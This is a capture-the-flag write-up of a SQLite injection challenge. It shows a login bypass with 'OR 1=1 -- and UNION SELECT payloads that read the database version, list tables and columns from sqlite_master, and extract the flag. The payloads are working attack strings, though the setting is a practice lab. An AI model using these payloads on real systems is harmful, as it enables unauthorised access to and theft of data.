Given the challenge description, I used the payload 'OR 1=1 -- for username and password to access the site, and it worked:
Login
We are presented with a search box, where it is most likely necessary to perform the SQL Injection. From the hint, we are told that it is SQLite. I tried a simple injection here as well, 'OR 1=1 -- , but nothing happened, since I was in the table displaying offices. So, I immediately tried using a UNION Based Injection:
1
' UNION SELECT * FROM users;
Admin User
Finding a single admin user in the database, I realized it was a UNION Based Injection. So, the first thing I did was retrieve the SQLite version:
1
' UNION SELECT 1,2,sqlite_version();
Since we can only display 3 elements at a time, as seen in the table, and the UNION Based Injection must have the same number of elements as the main query:
Version
Doing so, I was able to obtain the SQLite version 3.31.1. Now that we know how to perform the injection, let’s move on to the exploitation.
🔬 Vulnerability Analysis
Potential Vulnerabilities
SQL Injection
🎯 Solution Path
Exploitation Steps
Initial setup
Most likely, the flag will be in one of the other tables, so to enumerate them, I can use sqlite_master as follows:
1
' UNION SELECT 1,2,tbl_name FROM sqlite_master WHERE type='table' --
Table Attribute Enumeration
As we can see, the third column of the HTML table returns the tables contained in the database. The table more_table looks quite suspicious. Let’s move on to the exploitation.
Exploitation
To perform the SELECT, we need to know the column names of the tables, which we can enumerate again using sqlite_master:
1
' UNION SELECT 1,2,sql FROM sqlite_master WHERE tbl_name='more_table' --
Column Attribute Enumeration
Indeed, the more_table table contains a flag column. Now, we just need to print it by executing:
1
' UNION SELECT 1,2,flag FROM more_table --
And as we can see, the flag is displayed.
Flag capture
Manual Flag
🛠️ Exploitation Process
Approach
The automatic exploit logs in using the injection 'OR 1=1 -- in the username and password fields and then performs the injection in the main page’s search field, as previously demonstrated. Finally, it extracts the flag using a regex from the response text.
